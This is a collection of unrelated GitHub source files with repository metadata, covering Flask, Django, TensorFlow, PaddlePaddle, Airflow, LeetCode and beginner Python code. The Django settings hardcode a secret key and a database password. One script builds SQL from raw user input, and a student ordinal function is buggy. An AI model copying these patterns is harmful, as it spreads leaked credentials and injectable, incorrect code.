783e3e6e5e997ff2fe9c9d118183bb1e9b3cdac8 | 13d57862b1b126fbeb432b687713d5f7f2aad4ef | /cms/templates/Admin/index.py | 00cde0445b4d408612b57b53c1da6ae1f52f8de3 | [
"MIT"
] | permissive | angeal185/python-flask-material-design-cms | c71d415aaec616c7990ba96553de46d8c3d331db | 32c6251792bca75aebe231ab08b6de7ea1936998 | refs/heads/master | 2021-01-22T09:03:58.409067 | 2017-02-14T09:43:08 | 2017-02-14T09:43:08 | 81,928,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | {%- extends "Admin/base.py" -%}
{%- block pagewrapper -%}
<div id="page-wrapper">
<div class="container-fluid">
<div class="row">
<div class="col-lg-12">
<h1 class="page-header">Dashboard</h1>
</div>
</div>
</div>
</div>
{%- endblock -%}
| [
"noreply@github.com"
] | angeal185.noreply@github.com |
901fc3814d46e3c57026538f8016d37ea74efc9a | 178cfc4f54ed426401412e2f240ba39e105137f7 | /ex38.py | 1d1f19dd73dbe051346cb518048930b3e935dccb | [] | no_license | gsera/pythonhw | eccdd7ed8d752e02e5d9547257d77eb3f549b047 | f5ae358cc27913b22f349af6ef90ab269b795257 | refs/heads/master | 2021-01-10T10:54:33.985852 | 2016-03-06T06:18:50 | 2016-03-06T06:18:50 | 51,489,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | ten_things = "Apples Oranges Crows Telephone Light Sugar"
print "Wait there are not 10 things in that list. Let's fix that."
stuff = ten_things.split(' ')
more_stuff = ["Day", "Night", "Song", "Frisbee", "Corn", "Banana", "Girl", "Boy"]
while len(stuff) != 10:
next_one = more_stuff.pop()
print "Adding: ", next_one
stuff.append(next_one)
print "There are %d items now." % len(stuff)
print "There we go: ", stuff
print "Left's do some things with stuff."
print stuff[1]
print stuff[-1] # whoa! fancy
print stuff.pop()
print ' '.join(stuff) # what? cool!
print '#'.join(stuff[3:5]) # super stellar!
| [
"gsera@vatava.com"
] | gsera@vatava.com |
41cead60e323b3789fede1a5f530346dfe3c0e19 | 0192f085fa93ae282a7e3e4b109a5484ec2793ad | /get-readings.py | b5af21d614d28887feba242e580ed856e8245277 | [] | no_license | circuitFlower/io | a8b27703bccda240a498e43135e74116a7006724 | c12b2886522c3a65807f38f46d11f17dd005263e | refs/heads/master | 2016-09-05T16:27:44.490490 | 2015-09-22T00:31:31 | 2015-09-22T00:31:31 | 42,901,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | import socket
from time import sleep
import os
import sqlite3 as lite
#######################
ipaddr = "192.168.1.73" #### CHANGE ME TO ESP IP ADDRESS ON USER WIFI NETWORK ####
#######################
os.system("touch test.db")
con = lite.connect("test.db")
while True:
motion = raw_input("Table Name: ")
with con:
cur = con.cursor()
cmd = "DROP TABLE IF EXISTS " + str(motion)
cur.execute(str(cmd))
cmd = "CREATE TABLE " + str(motion) + "(x INT, y INT, z INT)"
cur.execute(str(cmd))
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipaddr, 80))
sockdata = ""
sock.sendall("hello\r")
sockdata = sock.recv(200).strip()
temp = sockdata.splitlines(0)
for b in range(len(temp)):
temp1 = temp[b]
x1 = temp1.find(",")
y1 = temp1.find(",", x1+1)
z1 = temp1.find(",", y1+1)
x = temp1[:x1]
y = temp1[x1+1:y1]
z = temp1[y1+1:]
print x, y, z
with con:
cmd = "INSERT INTO " + motion + " VALUES(?, ?, ?)"
cur.execute(str(cmd), (int(x), int(y), int(z)))
con.commit()
sock.close()
except KeyboardInterrupt:
print "\nStopping..."
break
print motion + " Complete!"
q = raw_input("Create another table? (y/n): ")
if (q == "n"):
print "Database saved as test.db in current directory"
con.close()
quit()
| [
"aervin@mac-aervin.local"
] | aervin@mac-aervin.local |
e429fcfe0ed1145b8e532cc0d35d416c34e5d342 | f35bf9ff7405c179289f049fad4396198b4a0ef8 | /Leetcode_30DaysChallenge/3_7_LeftMostColumtWithAtleast1.py | d46c3c7a45194e870424eb9cd84f76199cfa9c68 | [] | no_license | proRamLOGO/Competitive_Programming | d19fc542e9f10faba9a23f4ef3335f367ccc125a | 06e59ba95c3804cae10120ac7eda6482c3d72088 | refs/heads/master | 2023-01-03T07:27:25.960619 | 2020-10-29T19:15:53 | 2020-10-29T19:15:53 | 151,049,005 | 0 | 7 | null | 2020-10-29T19:15:54 | 2018-10-01T07:05:55 | C++ | UTF-8 | Python | false | false | 746 | py | # """
# This is BinaryMatrix's API interface.
# You should not implement it, or speculate about its implementation
# """
#class BinaryMatrix(object):
# def get(self, x: int, y: int) -> int:
# def dimensions(self) -> list[]:
class Solution:
def leftMostColumnWithOne(self, bm: 'BinaryMatrix') -> int:
n,m = bm.dimensions()
if ( n==0 or m==0 ) :
return -1 ;
x,y = 0,m-1
ans = m
while ( x < n and y > -1 ) :
if ( bm.get(x,y) == 1 ) :
ans = min(ans,y)
if ( y>0 and bm.get(x,y-1) == 1 ) :
y -= 1
continue
x += 1
if (ans==m) :
ans = -1
return ans
| [
"kapilgupta547@outlook.com"
] | kapilgupta547@outlook.com |
3bf18e8a7b79f3d28756f1a2066e6a137483bf68 | 75b4363d64e996ce21c0fc4832f5b607ab871e58 | /advanced/views.py | 6deca98fe66598bbf85a5bbb00ce0842ac461493 | [] | no_license | 7990satyam200/quoraclone | 2c68e328d0298416b794340a1ff66327e14b7335 | e116089e6e44fed81a0157ca03fbffa8e08498f3 | refs/heads/master | 2020-03-24T00:54:56.242387 | 2018-07-25T14:49:05 | 2018-07-25T14:49:05 | 142,313,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,901 | py | from django.shortcuts import render, get_object_or_404, redirect
from django.http import HttpResponse
from .models import Board, Topic, Post
from django.views.generic import TemplateView
from django.contrib.auth.models import User
from .models import Board, Topic, Post
from .forms import newTopicForm, PostForm
from django.contrib.auth.decorators import login_required
from django.views.generic import UpdateView
from django.utils import timezone
# Create your views here.
def home(request):
boards = Board.objects.all()
return render(request, 'home.html', {'boards':boards})
# class home(TemplateView):
# model =Board
# template_name = 'home.html'
def board_topic(request, pk):
board = Board.objects.get(pk=pk)
return render(request, 'topics.html', {'board':board})
# def new_topic(request, pk):
# board = get_object_or_404(Board, pk=pk)
# if request.method == 'POST':
# subject = request.POST['subject']
# message = request.POST['message']
# user = User.objects.first()
# topic = Topic.objects.create(subject=subject, board=board, starter=user)
# post = Post.objects.create(message = message, topic=topic, created_by= user)
# return redirect('board_topic', pk=board.pk)
# return render(request, 'new_topic.html', {'board':board})
@login_required
def new_topic(request, pk):
board = get_object_or_404(Board, pk=pk)
# user = User.objects.first() # TODO: get the currently logged in user
if request.method == 'POST':
form = newTopicForm(request.POST)
if form.is_valid():
topic = form.save(commit=False)
topic.board = board
topic.starter = request.user
topic.save()
post = Post.objects.create(
message=form.cleaned_data.get('message'),
topic=topic,
created_by=request.user
)
return redirect('board_topic', pk=pk) # TODO: redirect to the created topic page
else:
form = newTopicForm()
return render(request, 'new_topic.html', {'board': board, 'form': form})
def topic_posts(request, pk, topic_pk):
topic = get_object_or_404(Topic, board__pk=pk, pk=topic_pk)
return render(request, 'topic_posts.html', {'topic': topic})
@login_required
def reply_topic(request, pk, topic_pk):
board = Board.objects.get(pk=pk)
topic = get_object_or_404(Topic, board__pk=pk, pk= topic_pk)
if request.method =='POST':
form = PostForm(request.POST)
if form.is_valid():
post= form.save(commit=False)
post.topic = topic
post.created_by = request.user
post.save()
return redirect('topic_posts', pk=pk, topic_pk= topic_pk)
else:
form =PostForm()
return render(request, 'reply_topic.html', {'topic':topic, 'board':board, 'form':form})
| [
"7990satyam200@gmail.com"
] | 7990satyam200@gmail.com |
d50399a4eaf3be5ae62e3552b7e3c06a7c689c23 | e14605612c96d450bea1fca7fa9963105b6452fb | /tensorflow/python/training/ftrl_test.py | eb581048f165c2cfcebeff4238941b043d138053 | [
"Apache-2.0"
] | permissive | Yangqing/tensorflow | 0bb9259398eac98dc8e9f48cc0b7506f4d5f8a24 | 18792c1fce7e12d36c0f1704cff15ed820cc6ff5 | refs/heads/master | 2023-06-20T21:11:52.483377 | 2015-11-11T21:16:55 | 2015-11-11T21:16:55 | 45,876,905 | 2 | 2 | null | 2015-11-11T21:16:55 | 2015-11-10T00:38:20 | C++ | UTF-8 | Python | false | false | 8,845 | py | """Functional tests for Ftrl operations."""
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class FtrlOptimizerTest(tf.test.TestCase):
def testFtrlwithoutRegularization(self):
with self.test_session() as sess:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.60260963, -4.29698515]),
v0_val)
self.assertAllClose(np.array([-0.28432083, -0.56694895]),
v1_val)
def testFtrlwithoutRegularization2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.55607247, -3.98729396]),
v0_val)
self.assertAllClose(np.array([-0.28232238, -0.56096673]),
v1_val)
def testFtrlWithL1(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-7.66718769, -10.91273689]),
v0_val)
self.assertAllClose(np.array([-0.93460727, -1.86147261]),
v1_val)
def testFtrlWithL1_L2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=2.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-0.24059935, -0.46829352]),
v0_val)
self.assertAllClose(np.array([-0.02406147, -0.04830509]),
v1_val)
def applyOptimizer(self, opt, steps=5, is_sparse=False):
if is_sparse:
var0 = tf.Variable([[0.0], [0.0]])
var1 = tf.Variable([[0.0], [0.0]])
grads0 = tf.IndexedSlices(tf.constant([0.1], shape=[1, 1]),
tf.constant([0]),
tf.constant([2, 1]))
grads1 = tf.IndexedSlices(tf.constant([0.02], shape=[1, 1]),
tf.constant([1]),
tf.constant([2, 1]))
else:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
sess = tf.get_default_session()
v0_val, v1_val = sess.run([var0, var1])
if is_sparse:
self.assertAllClose([[0.0], [0.0]], v0_val)
self.assertAllClose([[0.0], [0.0]], v1_val)
else:
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run Ftrl for a few steps
for _ in range(steps):
update.run()
v0_val, v1_val = sess.run([var0, var1])
return v0_val, v1_val
# When variables are intialized with Zero, FTRL-Proximal has two properties:
# 1. Without L1&L2 but with fixed learning rate, FTRL-Proximal is identical
# with GradientDescent.
# 2. Without L1&L2 but with adaptive learning rate, FTRL-Proximal is identical
# with Adagrad.
# So, basing on these two properties, we test if our implementation of
# FTRL-Proximal performs same updates as Adagrad or GradientDescent.
def testEquivAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1),
is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseGradientDescentwithoutRegularizaion(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0), is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivGradientDescentwithoutRegularizaion(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
if __name__ == "__main__":
tf.test.main()
| [
"keveman@gmail.com"
] | keveman@gmail.com |
fb7af8fb50ff0d4a61bd2de7217ddf3e1061b0b9 | 274e7e18a87d524244c8de973ae74bec536382c9 | /markdown/files/001/2017-02-15-ordianal.py | 51d8496ae731b4bf8a0a3212dac20ee4d4e36060 | [] | no_license | tychonievich/cs1110s2017 | 469e3ecf0c056d7ffb3fb8f8b821eb5697b66aa0 | ce22f3f2872ed0bf1e0d157cc4c3898da2297a0c | refs/heads/master | 2021-01-12T01:58:21.947320 | 2017-07-17T12:22:29 | 2017-07-17T12:22:29 | 78,453,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | def ordinal(n):
'''1 -> 1st, 2 -> 2nd, 3 -> 3rd, 4 -> 4th, 5 -> 5th, ..., 12 -> 12th, 321 -> 321st, ...'''
# int -> str
# str + suffix
# determine the suffix (usually th, unless it isn't)
suffix = 'th'
if (n % 10) == 2:
suffix = 'nd'
s = str(n)
answer = s + suffix
return answer
print(ordinal(1))
print(ordinal(2))
print(ordinal(12))
print(ordinal(22))
print(ordinal(202))
print(ordinal(10))
print(ordinal(13)) | [
"tychonievich@gmail.com"
] | tychonievich@gmail.com |
98a9cbb0416283cf6ec743200af9b6aa132978eb | 3a7179882464ab8a85c46d067d17368d52a6ec4a | /dags/parallel_subdag.py | 2b5b1dd269014b27ccb273287e144fe7ea549f8e | [] | no_license | amrutprabhu/airflow-workouts | 9ce0882a168902c7d7ba51c754aade6b420b8012 | 2f2c9253f01b6a020f632e96eb3601b148f370c8 | refs/heads/master | 2023-04-12T04:21:07.291586 | 2021-04-21T15:52:54 | 2021-04-21T15:52:54 | 357,298,900 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 922 | py | from airflow.models import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.subdag import SubDagOperator
from datetime import datetime
from pandas import json_normalize
import json
from subdags.subdag_parallel_dag import subdag_parallel_dag
default_args = {
'start_date': datetime(2020, 1, 1)
}
with DAG('parallel_sub_dag',
schedule_interval='@daily',
default_args=default_args,
catchup=False) as dag:
task_1 = BashOperator(
task_id='task_1',
bash_command="sleep 3"
)
processing = SubDagOperator(
task_id = "processing_task",
subdag= subdag_parallel_dag('parallel_sub_dag', 'processing_task', default_args)
)
task_4 = BashOperator(
task_id ='task_4',
bash_command="sleep 3"
)
task_1 >> processing >> task_4
| [
"amrutprabhu42@gmail.com"
] | amrutprabhu42@gmail.com |
06bd8dc867e8a5440e6d2b59a233e76c70a4b767 | dbb4c9e2ebde90f479b58ef838c1fecfad1803ec | /portfolio/settings.py | f2f0faeda899c2661e6f375f566a6ac8b84791ed | [] | no_license | Kundan-Raj/Portfolio | b09b7c1e4f3d5e95e086a1f3a6e6a14bc13957d5 | f865300c604f3f615a889a0aeb3efe98b7dedb1a | refs/heads/master | 2022-12-18T16:33:32.688281 | 2020-09-30T06:55:58 | 2020-09-30T06:55:58 | 299,830,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,437 | py | """
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')eqqkfjr%jn7h2-p)zzgwg5v2f*wjs+ts)&iai2hczpozyz^$f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'courses.apps.CoursesConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
#'ENGINE': 'django.db.backends.sqlite3',
#'NAME': BASE_DIR / 'db.sqlite3',
'ENGINE': 'django.db.backends.postgresql',
'NAME':'portfoliodb',
'USER':'postgres',
'PASSWORD':'575658',
'HOST':'localhost',
'PORT':'5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/London'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
| [
"kundanr387@gmail.com"
] | kundanr387@gmail.com |
b2747e9aab89fd9bf82411e133d74e9ff9f2aa70 | 141facf5b402a0d91c7efea7fc18d6f4b9db0239 | /investissement/migrations/0001_initial.py | 32cf61b902d027cada12b0a2df42042c8034637a | [] | no_license | AssekoudaSamtou/NTI-APP | 79aae80ade80a5385454d119e1224fc70f865679 | 78bce3863f8e45292e79f9c995471efeff9c98d1 | refs/heads/master | 2022-12-15T23:19:44.942182 | 2020-03-21T16:54:40 | 2020-03-21T16:54:40 | 241,113,515 | 0 | 0 | null | 2022-12-08T03:37:52 | 2020-02-17T13:24:38 | JavaScript | UTF-8 | Python | false | false | 775 | py | # Generated by Django 2.2.7 on 2020-01-06 18:30
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Investissement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('montant', models.DecimalField(decimal_places=2, max_digits=10)),
('date_investissement', models.DateField(default=datetime.date.today)),
('date_decompte', models.DateField(default=datetime.date.today)),
('duree', models.PositiveSmallIntegerField(default=1)),
],
),
]
| [
"christophe1999da@gmail.com"
] | christophe1999da@gmail.com |
a121f41b3cc1380246409f13814789b0c1093fa0 | 0d5c77661f9d1e6783b1c047d2c9cdd0160699d1 | /python/paddle/fluid/tests/unittests/test_parallel_executor_test_while_train.py | 252793944462244539084a288e5259f216359650 | [
"Apache-2.0"
] | permissive | xiaoyichao/anyq_paddle | ae68fabf1f1b02ffbc287a37eb6c0bcfbf738e7f | 6f48b8f06f722e3bc5e81f4a439968c0296027fb | refs/heads/master | 2022-10-05T16:52:28.768335 | 2020-03-03T03:28:50 | 2020-03-03T03:28:50 | 244,155,581 | 1 | 0 | Apache-2.0 | 2022-09-23T22:37:13 | 2020-03-01T13:36:58 | C++ | UTF-8 | Python | false | false | 3,770 | py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
import numpy as np
import unittest
import os
def simple_fc_net():
img = fluid.layers.data(name='image', shape=[784], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
hidden = img
for _ in xrange(4):
hidden = fluid.layers.fc(
hidden,
size=200,
act='tanh',
bias_attr=fluid.ParamAttr(
initializer=fluid.initializer.Constant(value=1.0)))
prediction = fluid.layers.fc(hidden, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=prediction, label=label)
loss = fluid.layers.mean(loss)
return loss
class ParallelExecutorTestingDuringTraining(unittest.TestCase):
def check_network_convergence(self, use_cuda, build_strategy=None):
os.environ['CPU_NUM'] = str(4)
main = fluid.Program()
startup = fluid.Program()
with fluid.program_guard(main, startup):
loss = simple_fc_net()
test_program = main.clone(for_test=True)
opt = fluid.optimizer.SGD(learning_rate=0.001)
opt.minimize(loss)
batch_size = 32
image = np.random.normal(size=(batch_size, 784)).astype('float32')
label = np.random.randint(0, 10, (batch_size, 1), dtype="int64")
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup)
feed_dict = {'image': image, 'label': label}
train_exe = fluid.ParallelExecutor(
use_cuda=use_cuda,
loss_name=loss.name,
main_program=main,
build_strategy=build_strategy)
test_exe = fluid.ParallelExecutor(
use_cuda=use_cuda,
main_program=test_program,
share_vars_from=train_exe,
build_strategy=build_strategy)
for i in xrange(5):
test_loss, = test_exe.run([loss.name], feed=feed_dict)
train_loss, = train_exe.run([loss.name], feed=feed_dict)
self.assertTrue(
np.allclose(
train_loss, test_loss, atol=1e-8),
"Train loss: " + str(train_loss) + "\n Test loss:" +
str(test_loss))
def test_parallel_testing(self):
build_strategy = fluid.BuildStrategy()
build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.AllReduce
self.check_network_convergence(
use_cuda=True, build_strategy=build_strategy)
self.check_network_convergence(
use_cuda=False, build_strategy=build_strategy)
def test_parallel_testing_with_new_strategy(self):
build_strategy = fluid.BuildStrategy()
build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce
self.check_network_convergence(
use_cuda=True, build_strategy=build_strategy)
self.check_network_convergence(
use_cuda=False, build_strategy=build_strategy)
if __name__ == '__main__':
unittest.main()
| [
"xiaoyichao@haohaozhu.com"
] | xiaoyichao@haohaozhu.com |
d3e74923b973159dee2736519dce313ed3d4a166 | c51c31f864df0c262d593255c6567b521a3bc224 | /500/500.py | e6a7b33678aed844affd66bbd949bdcc0e565a5e | [] | no_license | huangke19/LeetCode | dd91091e25f7873ddd762afc708b722a71edd2ba | 46787a163ddbb1f6a5cab5acb57ca55731fb2a54 | refs/heads/master | 2021-05-05T02:31:31.044078 | 2018-12-17T04:58:19 | 2018-12-17T04:58:19 | 119,777,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
1. 检查先决条件
2. 定义子程序要解决的问题
3. 为子程序命名
4. 决定如何测试子程序
5. 在标准库中搜寻可用的功能
6. 考虑错误处理
7. 考虑效率问题
8. 研究算法和数据类型
9. 编写伪代码
1. 首先简要地用一句话来写下该子程序的目的,
2. 编写很高层次的伪代码
3. 考虑数据
4. 检查伪代码
10. 在伪代码中试验一些想法,留下最好的想法
'''
class Solution(object):
def findWords(self, words):
"""
:type words: List[str]
:rtype: List[str]
"""
a = set('qwertyuiop')
b = set('asdfghjkl')
c = set('zxcvbnm')
res = []
for word in words:
t = set(word.lower())
if t & a == t:
res.append(word)
if t & b == t:
res.append(word)
if t & c == t:
res.append(word)
return res
| [
"huangke@samsource.cn"
] | huangke@samsource.cn |
e12f70d1d4228dc05aa06bfdc0c7ba6a5cbd33c7 | 1bfd656374013b9a30612aca89921dc275c810f3 | /test/test_DTO_Parser_class/test_Filter_class/test_Filter_Main_Class.py | af6a3bc1ff622284fc965112eb76d10519dd959d | [] | no_license | clemparpa/paris_sportifs_data_traitement_v1.3 | ecc17906933bba4643f9f6535c25f00ff413705e | 93b1f6a996c8019ff31895dbe18e702dbef8e403 | refs/heads/master | 2023-01-24T05:45:16.381444 | 2020-08-17T07:25:04 | 2020-08-17T07:25:04 | 285,244,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,430 | py | import operator
from app.DTO_Parser_class.Filter_class import Filter_Main_Class as script
from app.DAO_class.DAO_FineDataModel import FDMCompModel
from app.DAO_functions import CRUD_functions as Crud
import pytest
class TestCompModelFilter:
@classmethod
def setup_method(cls):
comp_model = FDMCompModel.parse_obj(Crud.select_comp(2021))
cls.comp_filter_object = script.CompModelMainFilter(comp_model)
def test_filter_args_exception_raiser(self):
with pytest.raises(AttributeError):
self.comp_filter_object.filter(sort_matches=False, sort_key="random_string")
with pytest.raises(AttributeError):
self.comp_filter_object.filter(sort_matches=True)
def test_filter_separed_match_no_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
self.comp_filter_object.filter(all_matches=False, sort_matches=False, sort_key=None)
assert comp_model_before == self.comp_filter_object.comp_model
def test_filter_separed_match_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
for team in comp_model_before.teams:
team.played_as_home_matches.sort(key=operator.attrgetter("utc_date"))
team.played_as_away_matches.sort(key=operator.attrgetter("utc_date"))
self.comp_filter_object.filter(all_matches=False, sort_matches=True, sort_key="utc_date")
assert comp_model_before == self.comp_filter_object.comp_model
def test_filter_all_match_no_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
self.comp_filter_object.filter(all_matches=True, sort_matches=False, sort_key=None)
for team_before, team_after in zip(comp_model_before.teams, self.comp_filter_object.comp_model.teams):
assert (team_before.played_as_home_matches + team_before.played_as_away_matches) == team_after.match_list_
def test_filter_all_match_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
self.comp_filter_object.filter(all_matches=True, sort_matches=True, sort_key="utc_date")
for team_before, team_after in zip(comp_model_before.teams, self.comp_filter_object.comp_model.teams):
assert (sorted(team_before.played_as_home_matches + team_before.played_as_away_matches, key=operator.attrgetter("utc_date"))) == team_after.match_list_
| [
"clem.parpaillon@gmail.com"
] | clem.parpaillon@gmail.com |
